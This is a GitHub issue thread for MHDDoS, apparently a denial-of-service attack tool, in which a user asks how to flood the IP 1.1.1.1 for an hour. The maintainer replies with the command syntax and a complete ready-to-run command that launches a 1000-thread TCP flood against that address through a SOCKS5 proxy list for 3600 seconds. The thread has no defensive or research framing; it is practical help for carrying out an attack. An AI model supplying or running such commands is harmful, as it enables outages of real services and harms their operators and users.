### ISSUE TITLE
LD4

### ISSUE THREAD

**Issue by Maxxiecook** [MHProDev/MHDDoS#12]
If I want to use L4UDP to attack 1.1.1.1 and it lasts for 60 minutes, what kind of command should I enter?

**Comment by ItzNickM8** [comment]
layer 4 doesnt work. you can try if you want: http://<ip>:port and then the rest of the format like how it is with l7

**Comment by MHProDev** [comment]
ok now script updated, fixed

**Comment by MHProDev** [comment]
```
python3 start.py <method> https://<ip>:<port> 5 <thread> socks5.txt <multi> <time>
```
time in seconds

1m = 60s
60 * 60 = 3600

```
python3 start.py tcp https://1.1.1.1:80 5 1000 socks5.txt 100 3600

```
